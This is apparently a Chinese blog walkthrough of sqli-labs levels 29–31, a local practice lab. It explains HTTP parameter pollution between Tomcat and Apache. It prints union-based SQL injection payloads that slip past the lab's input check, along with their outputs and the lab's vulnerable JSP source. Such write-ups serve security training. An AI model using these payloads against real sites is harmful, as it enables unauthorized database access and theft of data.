文章目录
- 0.环境配置
- 1. HPP
- 29. GET-WAF-Single quote
- 30. Blind 29
- 31. twist 30
这一部分对应sqli-labs的29-31题,重点是http参数污染/HPP/HTTP Parameter Pollution。
0.环境配置
直接使用jspstudy,省略tomcat等安装步骤。
jspstudy的站点域名,配置到jspstudy/www路径,端口8080(默认80).
几个题的index.jsp,第27行的url修改成本地真实路径,以下是我的虚拟机中配置的路径:
URL sqli_labs = new URL("http://localhost/phproot/sqli-labs/Less-29/index.php?"+ qs);
1. HPP
HTTP参数污染可用于绕过安全检查。
先讲解一下服务器两层架构:
#mermaid-svg-9BaaaAk3yxihHg4h .label{font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family);fill:#333;color:#333}#mermaid-svg-9BaaaAk3yxihHg4h .label text{fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h .node rect,#mermaid-svg-9BaaaAk3yxihHg4h .node circle,#mermaid-svg-9BaaaAk3yxihHg4h .node ellipse,#mermaid-svg-9BaaaAk3yxihHg4h .node polygon,#mermaid-svg-9BaaaAk3yxihHg4h .node path{fill:#ECECFF;stroke:#9370db;stroke-width:1px}#mermaid-svg-9BaaaAk3yxihHg4h .node .label{text-align:center;fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h .node.clickable{cursor:pointer}#mermaid-svg-9BaaaAk3yxihHg4h .arrowheadPath{fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h .edgePath .path{stroke:#333;stroke-width:1.5px}#mermaid-svg-9BaaaAk3yxihHg4h .flowchart-link{stroke:#333;fill:none}#mermaid-svg-9BaaaAk3yxihHg4h .edgeLabel{background-color:#e8e8e8;text-align:center}#mermaid-svg-9BaaaAk3yxihHg4h .edgeLabel rect{opacity:0.9}#mermaid-svg-9BaaaAk3yxihHg4h .edgeLabel span{color:#333}#mermaid-svg-9BaaaAk3yxihHg4h .cluster rect{fill:#ffffde;stroke:#aa3;stroke-width:1px}#mermaid-svg-9BaaaAk3yxihHg4h .cluster text{fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h div.mermaidTooltip{position:absolute;text-align:center;max-width:200px;padding:2px;font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family);font-size:12px;background:#ffffde;border:1px solid #aa3;border-radius:2px;pointer-events:none;z-index:100}#mermaid-svg-9BaaaAk3yxihHg4h .actor{stroke:#ccf;fill:#ECECFF}#mermaid-svg-9BaaaAk3yxihHg4h text.actor>tspan{fill:#000;stroke:none}#mermaid-svg-9BaaaAk3yxihHg4h .actor-line{stroke:grey}#mermaid-svg-9BaaaAk3yxihHg4h .messageLine0{stroke-width:1.5;stroke-dasharray:none;stroke:#333}#mermaid-svg-9BaaaAk3yxihHg4h .messageLine1{stroke-width:1.5;stroke-dasharray:2, 2;stroke:#333}#mermaid-svg-9BaaaAk3yxihHg4h #arrowhead path{fill:#333;stroke:#333}#mermaid-svg-9BaaaAk3yxihHg4h .sequenceNumber{fill:#fff}#mermaid-svg-9BaaaAk3yxihHg4h #sequencenumber{fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h #crosshead path{fill:#333;stroke:#333}#mermaid-svg-9BaaaAk3yxihHg4h .messageText{fill:#333;stroke:#333}#mermaid-svg-9BaaaAk3yxihHg4h .labelBox{stroke:#ccf;fill:#ECECFF}#mermaid-svg-9BaaaAk3yxihHg4h .labelText,#mermaid-svg-9BaaaAk3yxihHg4h .labelText>tspan{fill:#000;stroke:none}#mermaid-svg-9BaaaAk3yxihHg4h .loopText,#mermaid-svg-9BaaaAk3yxihHg4h .loopText>tspan{fill:#000;stroke:none}#mermaid-svg-9BaaaAk3yxihHg4h .loopLine{stroke-width:2px;stroke-dasharray:2, 2;stroke:#ccf;fill:#ccf}#mermaid-svg-9BaaaAk3yxihHg4h .note{stroke:#aa3;fill:#fff5ad}#mermaid-svg-9BaaaAk3yxihHg4h .noteText,#mermaid-svg-9BaaaAk3yxihHg4h .noteText>tspan{fill:#000;stroke:none}#mermaid-svg-9BaaaAk3yxihHg4h .activation0{fill:#f4f4f4;stroke:#666}#mermaid-svg-9BaaaAk3yxihHg4h .activation1{fill:#f4f4f4;stroke:#666}#mermaid-svg-9BaaaAk3yxihHg4h .activation2{fill:#f4f4f4;stroke:#666}#mermaid-svg-9BaaaAk3yxihHg4h .mermaid-main-font{font-family:"trebuchet ms", verdana, arial;font-family:var(--mermaid-font-family)}#mermaid-svg-9BaaaAk3yxihHg4h .section{stroke:none;opacity:0.2}#mermaid-svg-9BaaaAk3yxihHg4h .section0{fill:rgba(102,102,255,0.49)}#mermaid-svg-9BaaaAk3yxihHg4h .section2{fill:#fff400}#mermaid-svg-9BaaaAk3yxihHg4h .section1,#mermaid-svg-9BaaaAk3yxihHg4h .section3{fill:#fff;opacity:0.2}#mermaid-svg-9BaaaAk3yxihHg4h .sectionTitle0{fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h .sectionTitle1{fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h .sectionTitle2{fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h .sectionTitle3{fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h .sectionTitle{text-anchor:start;font-size:11px;text-height:14px;font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family)}#mermaid-svg-9BaaaAk3yxihHg4h .grid .tick{stroke:#d3d3d3;opacity:0.8;shape-rendering:crispEdges}#mermaid-svg-9BaaaAk3yxihHg4h .grid .tick text{font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family)}#mermaid-svg-9BaaaAk3yxihHg4h .grid path{stroke-width:0}#mermaid-svg-9BaaaAk3yxihHg4h .today{fill:none;stroke:red;stroke-width:2px}#mermaid-svg-9BaaaAk3yxihHg4h .task{stroke-width:2}#mermaid-svg-9BaaaAk3yxihHg4h .taskText{text-anchor:middle;font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family)}#mermaid-svg-9BaaaAk3yxihHg4h .taskText:not([font-size]){font-size:11px}#mermaid-svg-9BaaaAk3yxihHg4h .taskTextOutsideRight{fill:#000;text-anchor:start;font-size:11px;font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family)}#mermaid-svg-9BaaaAk3yxihHg4h .taskTextOutsideLeft{fill:#000;text-anchor:end;font-size:11px}#mermaid-svg-9BaaaAk3yxihHg4h .task.clickable{cursor:pointer}#mermaid-svg-9BaaaAk3yxihHg4h .taskText.clickable{cursor:pointer;fill:#003163 !important;font-weight:bold}#mermaid-svg-9BaaaAk3yxihHg4h .taskTextOutsideLeft.clickable{cursor:pointer;fill:#003163 !important;font-weight:bold}#mermaid-svg-9BaaaAk3yxihHg4h .taskTextOutsideRight.clickable{cursor:pointer;fill:#003163 !important;font-weight:bold}#mermaid-svg-9BaaaAk3yxihHg4h .taskText0,#mermaid-svg-9BaaaAk3yxihHg4h .taskText1,#mermaid-svg-9BaaaAk3yxihHg4h .taskText2,#mermaid-svg-9BaaaAk3yxihHg4h .taskText3{fill:#fff}#mermaid-svg-9BaaaAk3yxihHg4h .task0,#mermaid-svg-9BaaaAk3yxihHg4h .task1,#mermaid-svg-9BaaaAk3yxihHg4h .task2,#mermaid-svg-9BaaaAk3yxihHg4h .task3{fill:#8a90dd;stroke:#534fbc}#mermaid-svg-9BaaaAk3yxihHg4h .taskTextOutside0,#mermaid-svg-9BaaaAk3yxihHg4h .taskTextOutside2{fill:#000}#mermaid-svg-9BaaaAk3yxihHg4h .taskTextOutside1,#mermaid-svg-9BaaaAk3yxihHg4h .taskTextOutside3{fill:#000}#mermaid-svg-9BaaaAk3yxihHg4h .active0,#mermaid-svg-9BaaaAk3yxihHg4h .active1,#mermaid-svg-9BaaaAk3yxihHg4h .active2,#mermaid-svg-9BaaaAk3yxihHg4h .active3{fill:#bfc7ff;stroke:#534fbc}#mermaid-svg-9BaaaAk3yxihHg4h .activeText0,#mermaid-svg-9BaaaAk3yxihHg4h .activeText1,#mermaid-svg-9BaaaAk3yxihHg4h .activeText2,#mermaid-svg-9BaaaAk3yxihHg4h .activeText3{fill:#000 !important}#mermaid-svg-9BaaaAk3yxihHg4h .done0,#mermaid-svg-9BaaaAk3yxihHg4h .done1,#mermaid-svg-9BaaaAk3yxihHg4h .done2,#mermaid-svg-9BaaaAk3yxihHg4h .done3{stroke:grey;fill:#d3d3d3;stroke-width:2}#mermaid-svg-9BaaaAk3yxihHg4h .doneText0,#mermaid-svg-9BaaaAk3yxihHg4h .doneText1,#mermaid-svg-9BaaaAk3yxihHg4h .doneText2,#mermaid-svg-9BaaaAk3yxihHg4h .doneText3{fill:#000 !important}#mermaid-svg-9BaaaAk3yxihHg4h .crit0,#mermaid-svg-9BaaaAk3yxihHg4h .crit1,#mermaid-svg-9BaaaAk3yxihHg4h .crit2,#mermaid-svg-9BaaaAk3yxihHg4h .crit3{stroke:#f88;fill:red;stroke-width:2}#mermaid-svg-9BaaaAk3yxihHg4h .activeCrit0,#mermaid-svg-9BaaaAk3yxihHg4h .activeCrit1,#mermaid-svg-9BaaaAk3yxihHg4h .activeCrit2,#mermaid-svg-9BaaaAk3yxihHg4h .activeCrit3{stroke:#f88;fill:#bfc7ff;stroke-width:2}#mermaid-svg-9BaaaAk3yxihHg4h .doneCrit0,#mermaid-svg-9BaaaAk3yxihHg4h .doneCrit1,#mermaid-svg-9BaaaAk3yxihHg4h .doneCrit2,#mermaid-svg-9BaaaAk3yxihHg4h .doneCrit3{stroke:#f88;fill:#d3d3d3;stroke-width:2;cursor:pointer;shape-rendering:crispEdges}#mermaid-svg-9BaaaAk3yxihHg4h .milestone{transform:rotate(45deg) scale(0.8, 0.8)}#mermaid-svg-9BaaaAk3yxihHg4h .milestoneText{font-style:italic}#mermaid-svg-9BaaaAk3yxihHg4h .doneCritText0,#mermaid-svg-9BaaaAk3yxihHg4h .doneCritText1,#mermaid-svg-9BaaaAk3yxihHg4h .doneCritText2,#mermaid-svg-9BaaaAk3yxihHg4h .doneCritText3{fill:#000 !important}#mermaid-svg-9BaaaAk3yxihHg4h .activeCritText0,#mermaid-svg-9BaaaAk3yxihHg4h .activeCritText1,#mermaid-svg-9BaaaAk3yxihHg4h .activeCritText2,#mermaid-svg-9BaaaAk3yxihHg4h .activeCritText3{fill:#000 !important}#mermaid-svg-9BaaaAk3yxihHg4h .titleText{text-anchor:middle;font-size:18px;fill:#000;font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family)}#mermaid-svg-9BaaaAk3yxihHg4h g.classGroup text{fill:#9370db;stroke:none;font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family);font-size:10px}#mermaid-svg-9BaaaAk3yxihHg4h g.classGroup text .title{font-weight:bolder}#mermaid-svg-9BaaaAk3yxihHg4h g.clickable{cursor:pointer}#mermaid-svg-9BaaaAk3yxihHg4h g.classGroup rect{fill:#ECECFF;stroke:#9370db}#mermaid-svg-9BaaaAk3yxihHg4h g.classGroup line{stroke:#9370db;stroke-width:1}#mermaid-svg-9BaaaAk3yxihHg4h .classLabel .box{stroke:none;stroke-width:0;fill:#ECECFF;opacity:0.5}#mermaid-svg-9BaaaAk3yxihHg4h .classLabel .label{fill:#9370db;font-size:10px}#mermaid-svg-9BaaaAk3yxihHg4h .relation{stroke:#9370db;stroke-width:1;fill:none}#mermaid-svg-9BaaaAk3yxihHg4h .dashed-line{stroke-dasharray:3}#mermaid-svg-9BaaaAk3yxihHg4h #compositionStart{fill:#9370db;stroke:#9370db;stroke-width:1}#mermaid-svg-9BaaaAk3yxihHg4h #compositionEnd{fill:#9370db;stroke:#9370db;stroke-width:1}#mermaid-svg-9BaaaAk3yxihHg4h #aggregationStart{fill:#ECECFF;stroke:#9370db;stroke-width:1}#mermaid-svg-9BaaaAk3yxihHg4h #aggregationEnd{fill:#ECECFF;stroke:#9370db;stroke-width:1}#mermaid-svg-9BaaaAk3yxihHg4h #dependencyStart{fill:#9370db;stroke:#9370db;stroke-width:1}#mermaid-svg-9BaaaAk3yxihHg4h #dependencyEnd{fill:#9370db;stroke:#9370db;stroke-width:1}#mermaid-svg-9BaaaAk3yxihHg4h #extensionStart{fill:#9370db;stroke:#9370db;stroke-width:1}#mermaid-svg-9BaaaAk3yxihHg4h #extensionEnd{fill:#9370db;stroke:#9370db;stroke-width:1}#mermaid-svg-9BaaaAk3yxihHg4h .commit-id,#mermaid-svg-9BaaaAk3yxihHg4h .commit-msg,#mermaid-svg-9BaaaAk3yxihHg4h .branch-label{fill:lightgrey;color:lightgrey;font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family)}#mermaid-svg-9BaaaAk3yxihHg4h .pieTitleText{text-anchor:middle;font-size:25px;fill:#000;font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family)}#mermaid-svg-9BaaaAk3yxihHg4h .slice{font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family)}#mermaid-svg-9BaaaAk3yxihHg4h g.stateGroup text{fill:#9370db;stroke:none;font-size:10px;font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family)}#mermaid-svg-9BaaaAk3yxihHg4h g.stateGroup text{fill:#9370db;fill:#333;stroke:none;font-size:10px}#mermaid-svg-9BaaaAk3yxihHg4h g.statediagram-cluster .cluster-label text{fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h g.stateGroup .state-title{font-weight:bolder;fill:#000}#mermaid-svg-9BaaaAk3yxihHg4h g.stateGroup rect{fill:#ECECFF;stroke:#9370db}#mermaid-svg-9BaaaAk3yxihHg4h g.stateGroup line{stroke:#9370db;stroke-width:1}#mermaid-svg-9BaaaAk3yxihHg4h .transition{stroke:#9370db;stroke-width:1;fill:none}#mermaid-svg-9BaaaAk3yxihHg4h .stateGroup .composit{fill:white;border-bottom:1px}#mermaid-svg-9BaaaAk3yxihHg4h .stateGroup .alt-composit{fill:#e0e0e0;border-bottom:1px}#mermaid-svg-9BaaaAk3yxihHg4h .state-note{stroke:#aa3;fill:#fff5ad}#mermaid-svg-9BaaaAk3yxihHg4h .state-note text{fill:black;stroke:none;font-size:10px}#mermaid-svg-9BaaaAk3yxihHg4h .stateLabel .box{stroke:none;stroke-width:0;fill:#ECECFF;opacity:0.7}#mermaid-svg-9BaaaAk3yxihHg4h .edgeLabel text{fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h .stateLabel text{fill:#000;font-size:10px;font-weight:bold;font-family:'trebuchet ms', verdana, arial;font-family:var(--mermaid-font-family)}#mermaid-svg-9BaaaAk3yxihHg4h .node circle.state-start{fill:black;stroke:black}#mermaid-svg-9BaaaAk3yxihHg4h .node circle.state-end{fill:black;stroke:white;stroke-width:1.5}#mermaid-svg-9BaaaAk3yxihHg4h #statediagram-barbEnd{fill:#9370db}#mermaid-svg-9BaaaAk3yxihHg4h .statediagram-cluster rect{fill:#ECECFF;stroke:#9370db;stroke-width:1px}#mermaid-svg-9BaaaAk3yxihHg4h .statediagram-cluster rect.outer{rx:5px;ry:5px}#mermaid-svg-9BaaaAk3yxihHg4h .statediagram-state .divider{stroke:#9370db}#mermaid-svg-9BaaaAk3yxihHg4h .statediagram-state .title-state{rx:5px;ry:5px}#mermaid-svg-9BaaaAk3yxihHg4h .statediagram-cluster.statediagram-cluster .inner{fill:white}#mermaid-svg-9BaaaAk3yxihHg4h .statediagram-cluster.statediagram-cluster-alt .inner{fill:#e0e0e0}#mermaid-svg-9BaaaAk3yxihHg4h .statediagram-cluster .inner{rx:0;ry:0}#mermaid-svg-9BaaaAk3yxihHg4h .statediagram-state rect.basic{rx:5px;ry:5px}#mermaid-svg-9BaaaAk3yxihHg4h .statediagram-state rect.divider{stroke-dasharray:10,10;fill:#efefef}#mermaid-svg-9BaaaAk3yxihHg4h .note-edge{stroke-dasharray:5}#mermaid-svg-9BaaaAk3yxihHg4h .statediagram-note rect{fill:#fff5ad;stroke:#aa3;stroke-width:1px;rx:0;ry:0}:root{--mermaid-font-family: '"trebuchet ms", verdana, arial';--mermaid-font-family: "Comic Sans MS", "Comic Sans", cursive}#mermaid-svg-9BaaaAk3yxihHg4h .error-icon{fill:#522}#mermaid-svg-9BaaaAk3yxihHg4h .error-text{fill:#522;stroke:#522}#mermaid-svg-9BaaaAk3yxihHg4h .edge-thickness-normal{stroke-width:2px}#mermaid-svg-9BaaaAk3yxihHg4h .edge-thickness-thick{stroke-width:3.5px}#mermaid-svg-9BaaaAk3yxihHg4h .edge-pattern-solid{stroke-dasharray:0}#mermaid-svg-9BaaaAk3yxihHg4h .edge-pattern-dashed{stroke-dasharray:3}#mermaid-svg-9BaaaAk3yxihHg4h .edge-pattern-dotted{stroke-dasharray:2}#mermaid-svg-9BaaaAk3yxihHg4h .marker{fill:#333}#mermaid-svg-9BaaaAk3yxihHg4h .marker.cross{stroke:#333}:root { --mermaid-font-family: "trebuchet ms", verdana, arial;}#mermaid-svg-9BaaaAk3yxihHg4h {color: rgba(0, 0, 0, 0.75);font: ;}
client
tomcat
apache
Apache和Tomcat都可以做为独立的Web服务器运行。Apache是Web服务器,只处理 静态HTML;Tomcat是Java应用服务器,静态HTML,动态 JSP Servlet 都能处理。
现在要说的情况是,客户端向tomcat发送请求,tomcat再向发送apache请求。
下面列举了一些常见Web服务器对同样名称的参数出现多次的处理方式:
WEB服务器
|
参数获取函数
|
获取到的参数
|
PHP/Apache
|
$_GET(“par”)
|
Last
|
JSP/Tomcat
|
Request.getParameter(“par”)
|
First
|
Perl(CGI)/Apache
|
Param(“par”)
|
First
|
ASP/IIS
|
Request.QueryString(“par”)
|
All (comma-delimited string)
|
Python/Apache
|
getvalue(“par”)
|
All (List)
|
然后直接上题。
29. GET-WAF-Single quote
访问/sqli-labs/Less-29/index.jsp?id=1
Your Login name:Dumb
Your Password:Dumb
判断下闭合和注入:
?id=1'
?id=1' '
发现无论怎么输入,都会返回错误页面。其实是因为tomcat服务器做了检查(可理解成waf)。
此时web服务器是apache(可以用wappalyzer浏览器插件查看),重复参数会取最后一个,那么访问/sqli-labs/Less-29/index.jsp?id=1&id=2
Your Login name:Angelina
Your Password:I-kill-you
访问/sqli-labs/Less-29/index.jsp?id=1&id=2&id=3
Your Login name:Dummy
Your Password:p@ssword
符合预期。再判断一下闭合和注入:
?id=1&id=1'
-- You have an error in your SQL syntax;....?id=1&id=1' '
-- Your Login name:Dumb
-- Your Password:Dumb
ok,绕过成功,闭合是引号,继续构造paylaod:
-- 确定字段并占位
?id=1&id=-1' union select 1,2,3 -- x
-- Your Login name:2
-- Your Password:3-- 获取信息
?id=1&id=-1' union select 1,version(),database() -- x
-- Your Login name:5.5.47
-- Your Password:security
后面获取表名、库名、字段,按套路来就行了。
看下源码:
<%String id = request.getParameter("id"); // jsp这样获取get参数String qs = request.getQueryString();if(id!=null){if(id!=""){try{String rex = "^\\d+$"; // 检查id是数字 这里取的是id=1Boolean match=id.matches(rex);if(match == true){URL sqli_labs = new URL("http://localhost/phproot/sqli-labs/Less-29/index.php?"+ qs);URLConnection sqli_labs_connection = sqli_labs.openConnection();BufferedReader in = new BufferedReader(new InputStreamReader(sqli_labs_connection.getInputStream()));String inputLine;while ((inputLine = in.readLine()) != null) out.print(inputLine);in.close();}else{response.sendRedirect("hacked.jsp"); // 用第一个id判断闭合会重定向到失败页面}} catch (Exception ex){out.print("<font color= '#FFFF00'>");out.println(ex);out.print("</font>"); }finally{}}}else{URL sqli_labs = new URL("http://localhost/phproot/phproot/sqli-labs/Less-29/index.php");// 无参数也会访问php}
%>
30. Blind 29
判断闭合:
?id=1&id=1'
-- 正常?id=1&id=1"
-- 无username/password?id=1&id=1""
-- 有username/password
闭合是双引号。
-- 确定字段并占位
?id=1&id=-1" union select 1,2,3 -- x
-- Your Login name:2
-- Your Password:3-- 获取信息
?id=1&id=-1" union select 1,version(),database() -- x
-- Your Login name:5.5.47
-- Your Password:security
看php源码 其实还把print_r(mysql_error())
注释掉了,不过并没有用到报错注入。
31. twist 30
判断闭合:
?id=1&id=1'
-- 正常回显username/password?id=1&id=1"
-- 提示语法错误 "1"") LIMIT 0,1
根据报错,闭合是双引号加括号。
?id=1&id=-1") union select 1,version(),database() -- x
-- Your Login name:5.5.47
-- Your Password:security
sqli-labs-waf相关推荐
- SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...
- SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
- SQLi LABS Less 26a 联合注入+布尔盲注
第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- sqli——labs初学者通关详
目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...
- SQLi LABS Less-36
第三十六关注入点为 单引号字符串型 , 注入方式为 报错注入 此关卡通过 代码WAF 对单引号' 进行了转义 , 我们使用 %df%27% 代替单引号' 绕过WAF , 先上结果 ?id=1%df%2 ...
- SQLi LABS Less-35
第三十五关注入点为 数值型 , 注入方式为 报错注入 此关卡通过 代码WAF 转义了单引号' , 我们使用 编译 绕过WAF , 先上结果 ?id=1 and updatexml(1,concat(0 ...
- SQLi LABS Less-34
第三十四关注入点为 单引号字符串型 , 注入类型为 报错注入 此关卡通过 代码WAF 将单引号' 转义成 /' , 我们使用 编译 绕过WAF , 先上结果 �' and updatexml(1,co ...
- SQLi LABS Less-8 布尔盲注
「作者主页」:士别三日wyx 「作者简介」:CSDN top200.阿里云博客专家.华为云享专家.网络安全领域优质创作者 第八关是单引号字符型注入,推荐使用布尔盲注 方式一:布尔盲注 第一步.判断注入 ...
- SQLi LABS Less-31
第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号 在url地址栏中输入 1") and true-- a,使SQL恒成立,页面正常显示 再输入 1") an ...
最新文章
- 3D视觉检测的未来:光度立体技术
- ['1','2','3'].map(parseInt)
- 为什么不能在SQL拼接模糊匹配符号
- 从零开始撸一个Fresco之内存缓存
- oracle中的存储过程
- Hibernate映射组件属性为集合(二)
- Mongodb语法学习:查询
- linux 查看设备 usb设备驱动程序,Linux USB设备驱动程序未被探测
- 【ENVI】利用矢量shp数据做裁剪报错及解决办法
- flash 围棋_中国卫视执白0.5目胜flash77
- C#指定图片添加文字
- unity如何实现图片透视_实战 | 自己实现扫描全能王
- office办公软件之ppt视频录制
- 亲自动手写爬虫系列三、爬取队列
- 基于J2EE人事考勤管理系统设计与实现(论文+项目源码) 运行环境: idea ,maven,mysql
- android自定义起止时间的时间刻度尺,Android 自定义View篇(六)实现时钟表盘效果...
- ie11加载项启用不了 java,IE11或IE10中的管理加载项按钮是灰色的不能用怎么办
- pc二维码支付demo(支付宝/微信)
- acad.exe启动参数
- SprinBoot集成disConf的过程梳理
热门文章
- 安装Sourcetree项目开发工具
- 工具 | 使用 CLion 编译调试 MySQL 8.0
- Java中实用的实体类映射工具MapStruct
- html的confirm弹窗样式修改,模拟自定义alert与confirm样式
- 【快速入门】基础的Latex语法
- 怎么用python算单价和总价_怎样用EXCEL表格自动算出数量单价总金额
- java试题库管理系统源代码_Java试题库管理源代码
- R语言学堂推文索引-2022年11月
- 常用java工具代码备忘
- 利用ADS中的Batch Simulation进行DDR仿真